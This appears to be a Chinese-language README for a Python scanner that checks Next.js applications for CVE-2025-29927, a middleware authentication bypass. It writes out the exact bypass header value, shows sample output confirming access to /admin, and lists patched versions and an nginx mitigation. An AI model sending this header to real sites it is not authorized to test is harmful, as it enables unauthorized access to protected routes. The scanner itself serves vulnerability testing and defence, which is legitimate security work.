这个基于Python的智能扫描器帮助检测Next.js应用程序中的CVE-2025-29927漏洞——一种关键的中间件绕过漏洞,允许攻击者通过精心构造的HTTP头来跳过身份验证。
🧠 该工具不仅识别HTTP重定向,还识别客户端重定向机制,例如
<meta http-equiv="refresh">、基于关键词的登录重定向以及静默认证绕过。
x-middleware-subrequest 绕过头<meta refresh>的重定向login、sign in、authentication 的HTML内容$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
如果您的应用受到影响,请执行以下操作:
v15.2.3 或更高版本(或 14.2.25+ / 13.5.7+)proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 允许攻击者通过使用精心构造的值操作 x-middleware-subrequest 头来绕过 Next.js 中间件检查,例如:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
在受影响版本中,这会完全禁用中间件执行——从而允许直接访问受保护的路由,如 /dashboard、/admin 等。
维护者:@mrzblackhat
欢迎通过Telegram联系我提出建议、改进或贡献。
next.js CVE-2025-29927 bugbounty middleware bypass authentication web security python security scanner ethical hacking
此工具仅供教育及研究目的使用。请负责任地使用。